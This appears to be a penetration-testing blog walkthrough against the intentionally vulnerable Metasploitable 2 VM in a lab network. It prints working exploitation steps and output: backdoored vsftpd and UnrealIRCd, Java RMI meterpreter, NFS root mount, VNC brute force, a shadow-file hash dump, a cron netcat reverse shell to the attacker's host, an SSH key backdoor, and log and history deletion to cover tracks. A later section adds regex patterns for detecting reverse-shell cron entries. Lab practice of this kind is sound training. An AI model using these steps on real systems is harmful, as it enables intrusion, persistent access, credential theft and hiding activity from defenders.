Trying 192.168.182.150...
Connected to 192.168.182.150.
Escape character is '^]'.
                _                  _       _ _        _     _      ____  
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ 
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ 
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
                            |_|                                          


Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started


metasploitable login: 

Banner grabbing the web server (port 80)

Using netcat I found that the victim is running Apache httpd 2.2.8 ((Ubuntu) DAV/2). Opening http://192.168.182.150 in a browser also showed applications such as Damn Vulnerable Web App, Mutillidae, phpMyAdmin, a wiki, and WebDAV running on the victim, along with the same msfadmin/msfadmin credentials to log in with.


VNC on port 5900

The nmap scan showed the victim running VNC (protocol 3.3). I tried connecting to it, but it requires a password to get in. I will brute-force my way in later in this pentest.

root@kali:~# vncviewer 192.168.182.150
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: 
Reading password failed
root@kali:~# 

Exploitation

VSFTPD v2.3.4 Backdoor (Port 21)

According to nmap, Metasploitable is running vsftpd 2.3.4. In 2011 a backdoor was inserted into the vsftpd-2.3.4.tar.gz archive on the project's download site, between June 30th and July 1st 2011, and removed on July 3rd 2011. To check whether this server carries it, log in with any username that ends in “:)” and any password. If the backdoor is present, the “:)” triggers it regardless of credentials: the login hangs after the password prompt while the server opens a listener on port 6200, and connecting there with netcat gives a root shell. The Metasploit module exploit/unix/ftp/vsftpd_234_backdoor, linked here, automates the same steps.

root@kali:~# ftp 192.168.182.150
Connected to 192.168.182.150.
220 (vsFTPd 2.3.4)
Name (192.168.182.150:root): backdoor:)
331 Please specify the password.
Password:
root@kali:~# nc 192.168.182.150 6200
whoami
root
id
uid=0(root) gid=0(root)
ls -l
total 85
drwxr-xr-x   2 root root  4096 May 13  2012 bin
drwxr-xr-x   4 root root  1024 May 13  2012 boot
lrwxrwxrwx   1 root root    11 Apr 28  2010 cdrom -> media/cdrom
drwxr-xr-x  13 root root 13800 Feb  4 00:27 dev
drwxr-xr-x  95 root root  4096 Feb  4 00:30 etc
drwxr-xr-x   6 root root  4096 Apr 16  2010 home
drwxr-xr-x   2 root root  4096 Mar 16  2010 initrd
lrwxrwxrwx   1 root root    32 Apr 28  2010 initrd.img -> boot/initrd.img-2.6.24-16-server
drwxr-xr-x  13 root root  4096 May 13  2012 lib
drwx------   2 root root 16384 Mar 16  2010 lost+found
drwxr-xr-x   4 root root  4096 Mar 16  2010 media
drwxr-xr-x   3 root root  4096 Apr 28  2010 mnt
-rw-------   1 root root 10147 Feb  4 00:30 nohup.out
drwxr-xr-x   2 root root  4096 Mar 16  2010 opt
dr-xr-xr-x 108 root root     0 Feb  4 00:27 proc
drwxr-xr-x  13 root root  4096 Feb  4 00:30 root
drwxr-xr-x   2 root root  4096 May 13  2012 sbin
drwxr-xr-x   2 root root  4096 Mar 16  2010 srv
drwxr-xr-x  12 root root     0 Feb  4 00:27 sys
drwxrwxrwt   4 root root  4096 Feb  4 00:30 tmp
drwxr-xr-x  12 root root  4096 Apr 27  2010 usr
drwxr-xr-x  15 root root  4096 May 20  2012 var
lrwxrwxrwx   1 root root    29 Apr 28  2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server

Java RMI Server Insecure Default Configuration Java Code Execution (Port 1099)

Searching for a Java exploit, I came across this one in the Rapid7 Vulnerability & Exploit Database.

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.

What I did was use metasploit and load the module “exploit/multi/misc/java_rmi_server” and set the options up to run the exploit. What’s a bit different here is I set the payload to java/meterpreter/reverse_tcp before running the exploit.

msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOST                       yes       The target address
   RPORT      1099             yes       The target port
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf exploit(java_rmi_server) > set RHOST 192.168.182.150
RHOST => 192.168.182.150
msf exploit(java_rmi_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOST      192.168.182.150  yes       The target address
   RPORT      1099             yes       The target port
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf exploit(java_rmi_server) > set LHOST 192.168.182.147
LHOST => 192.168.182.147
msf exploit(java_rmi_server) > exploit

[*] Started reverse TCP handler on 192.168.182.147:4444 
[*] Using URL: http://0.0.0.0:8080/boSyAV2fxhkfw
[*] Local IP: http://192.168.182.147:8080/boSyAV2fxhkfw
[*] Server started.
[*] 192.168.182.150:1099 - Sending RMI Header...
[*] 192.168.182.150:1099 - Sending RMI Call...
[*] 192.168.182.150  java_rmi_server - Replied to request for payload JAR
[*] Sending stage (45741 bytes) to 192.168.182.150
[*] Meterpreter session 1 opened (192.168.182.147:4444 -> 192.168.182.150:51250) at 2017-02-04 05:28:51 -0600
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > 

Ingreslock (Port 1524)

Port 1524 (ingreslock) is normally used for locking parts of an Ingres database, but it is also a port that trojans have historically bound shells to. On Metasploitable a root shell is deliberately listening there (nmap labelled it “Metasploitable root shell”), so a plain netcat connection is all it takes.

root@kali:~# nc 192.168.182.150 1524
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:/# 

NFS Share misconfiguration (Port 2049)

NFS (Network File System) is a Unix service for sharing directories across the network, and a misconfigured export is a vulnerability in itself. The nmap scan showed NFS on port 2049. Running showmount -e 192.168.182.150 revealed that the root directory is exported to every host (the * in the export list)! That is something I was certainly going to exploit, as shown below. Note also that the later write to /root/.ssh/authorized_keys succeeds, which tells us root is not squashed on this export: our root UID maps to root on the server.

Showing NFS server’s export list

root@kali:~# showmount -e 192.168.182.150
Export list for 192.168.182.150:
/ *
root@kali:~# 

I created a mount point and mounted the export so I could browse the server's entire filesystem. The df -h output confirms that the server's root directory is now mounted on Kali. In the post-exploitation phase I will use this mount to add an SSH key to the server's authorized_keys file; more on that later in this guide.

root@kali:~# mkdir /temp/root_access2Metaploitable/
root@kali:~# mount -t nfs 192.168.182.150:/ /temp/root_access2Metaploitable/ -o nolock
root@kali:~# df -h
Filesystem         Size  Used Avail Use% Mounted on
udev                10M     0   10M   0% /dev
tmpfs              1.6G  9.1M  1.6G   1% /run
/dev/sda1           57G   17G   38G  31% /
tmpfs              3.9G  212K  3.9G   1% /dev/shm
tmpfs              5.0M     0  5.0M   0% /run/lock
tmpfs              3.9G     0  3.9G   0% /sys/fs/cgroup
tmpfs              798M  8.0K  798M   1% /run/user/132
tmpfs              798M   12K  798M   1% /run/user/0
/dev/sr0           3.1G  3.1G     0 100% /media/cdrom0
192.168.182.150:/  7.0G  1.5G  5.2G  22% /temp/root_access2Metaploitable

Bruteforcing Vncviewer Login Credentials (Port 5900)

Using Metasploit's auxiliary module auxiliary/scanner/vnc/vnc_login, I brute-forced the VNC login and recovered the password “password”. With that I ran vncviewer again with the correct password and got not only a GUI but a root session: the desktop is root's X session, so any terminal opened in it is a root shell.

msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary(vnc_login) > set RHOSTS 192.168.182.150
RHOSTS => 192.168.182.150
msf auxiliary(vnc_login) > run

[*] 192.168.182.150:5900 - Starting VNC login sweep
[!] No active DB -- Credential data will not be saved!
[+] 192.168.182.150:5900 - LOGIN SUCCESSFUL: :password
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(vnc_login) > 
root@kali:~# vncviewer 192.168.182.150
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: 
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0

UnrealIRCD 3.2.8.1 Backdoor Command Execution (Port 6667)

This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. The backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010. Let's use the Metasploit module exploit/unix/irc/unreal_ircd_3281_backdoor to exploit it.

root@kali:~# msfconsole
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor 
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.182.150
RHOST => 192.168.182.150
msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse TCP double handler on 192.168.182.147:4444 
[*] Connected to 192.168.182.150:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ce3SW1J9SQ4K3cOX;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ce3SW1J9SQ4K3cOX\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.182.147:4444 -> 192.168.182.150:58533) at 2017-02-04 00:35:19 -0600

id
uid=0(root) gid=0(root)
whoami
root

Post Exploitation

Getting the usernames and passwords from the Victim

With a root shell, cat /etc/shadow shows the password hash for every account. The $1$ prefix identifies these as MD5-crypt hashes (the “MD5(Unix)” format in John the Ripper and hashcat), a salted but fast scheme that cracks quickly with a wordlist; accounts whose second field is * or ! have no usable password hash.

root@metasploitable:/# cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::
irc:*:14684:0:99999:7:::
gnats:*:14684:0:99999:7:::
nobody:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
dhcp:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::
snmp:*:15480:0:99999:7:::
root@metasploitable:/# 

Enable a Cron Job to run every 5 minutes

The line below, appended to /etc/crontab on the victim, runs every 5 minutes as root and uses netcat to send a root shell back to our machine. Open /etc/crontab, add the line at the end, save the file, and restart cron with service cron restart. This relies on the victim's netcat supporting -e, which the traditional netcat on Metasploitable does. Then all you have to do is start a netcat listener on Kali to pick up the shell.

 */5 * * * * root nc 192.168.182.147 12345 -e /bin/bash 

This sets up the listener on Kali to catch the shell:

nc -lvp 12345
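Seen from the defender's side, the cron line above is a loud indicator. As an added example (my code, not the author's), the Python below parses /etc/crontab-format entries and flags commands that look like reverse shells or download-and-execute one-liners. The patterns and the sample crontab are constructed for the example; the last sample line is the one added above.

```python
"""Detect reverse-shell style entries in a system crontab."""
import re

# Indicators a defender would look for in scheduled commands (constructed list).
SUSPICIOUS = [
    (re.compile(r"\bnc\b.*\s-e\s"), "netcat with -e (program bound to a socket)"),
    (re.compile(r"\bncat\b.*(?:-e|--exec)"), "ncat executing a program"),
    (re.compile(r"/dev/tcp/"), "bash /dev/tcp redirection"),
    (re.compile(r"\bbash\s+-i\b"), "interactive bash spawned from cron"),
    (re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b"), "download piped into a shell"),
    (re.compile(r"\bpython[23]?\b.*\bsocket\b"), "python socket one-liner"),
]

# /etc/crontab format: five time fields, the user to run as, then the command.
CRON_LINE = re.compile(r"^\s*(?P<schedule>(?:\S+\s+){5})(?P<user>\S+)\s+(?P<command>.+)$")


def parse_system_crontab(text):
    """Return the job entries of an /etc/crontab, skipping comments and VAR=value lines."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_LINE.match(line)
        if m:
            entries.append({"schedule": m.group("schedule").split(),
                            "user": m.group("user"),
                            "command": m.group("command").strip()})
    return entries


def suspicious_entries(text):
    """Return (user, command, reason) for every entry matching an indicator."""
    hits = []
    for entry in parse_system_crontab(text):
        for pattern, reason in SUSPICIOUS:
            if pattern.search(entry["command"]):
                hits.append((entry["user"], entry["command"], reason))
                break
    return hits


# Constructed sample: two stock Ubuntu entries plus the persistence line from above.
SAMPLE_CRONTAB = """# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || run-parts --report /etc/cron.daily
*/5 * * * * root nc 192.168.182.147 12345 -e /bin/bash
"""

if __name__ == "__main__":
    for user, command, reason in suspicious_entries(SAMPLE_CRONTAB):
        print("%s: %s  [%s]" % (user, command, reason))
```

The same check belongs on /etc/cron.d/*, the per-user crontabs under /var/spool/cron, and the cron.hourly/daily directories, since any of them gives an attacker the same foothold.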

Adding a SSH key on the Server for future use

Since the NFS mount gives us write access to root's home directory, I generated my own SSH key pair with ssh-keygen and appended the public key to Metasploitable's authorized_keys file through the mount, using
cat ~/.ssh/id_rsa.pub >> /temp/root_access2Metaploitable/root/.ssh/authorized_keys

root@kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
e7:89:5d:df:ec:86:ec:88:18:ab:7c:ea:67:d3:c7:49 root@kali
The key's randomart image is:
+---[RSA 2048]----+
|                 |
|                 |
|                 |
|                 |
|        S . .    |
|         = oE. o |
|        o.+o o..o|
|     .  =+..+.o..|
|     .=*o........|
+-----------------+
root@kali:~# cat ~/.ssh/id_rsa.pub >> /temp/root_access2Metaploitable/root/.ssh/authorized_keys

We can now SSH in as root with the key and no password, and come back at any time.

root@kali:~# ssh root@192.168.182.150
Last login: Sat Feb  4 15:56:27 2017 from 192.168.182.147
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~# 
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:~# hostname
metasploitable
root@metasploitable:~# 

Covering Tracks

Clear Event Logs

Using vi, nano, kwrite or any other editor, open /var/log/messages and delete the entries from around the time you compromised the system, or all of them if you like. Keep in mind that an emptied or truncated log is itself conspicuous, and that SSH logins are recorded elsewhere too (auth.log and the wtmp/lastlog databases), not only in this file.

Clearing terminal history

You can clear the current session's bash history with history -c; this only empties the in-memory history of the running shell.

To remove what earlier sessions saved, delete the .bash_history file on the victim as well:

rm ~/.bash_history

Conclusion

Metasploitable offers a set of common vulnerabilities in a VM where we can practise penetration testing techniques, but it is only a starting point for anyone interested in learning about pentesting. Later on I will exploit other vulnerable VMs from Vulnhub and Pentester Labs.

Note: I will continue to add to this guide over time. If you have any comments, questions, or other topics you would like me to cover, let me know.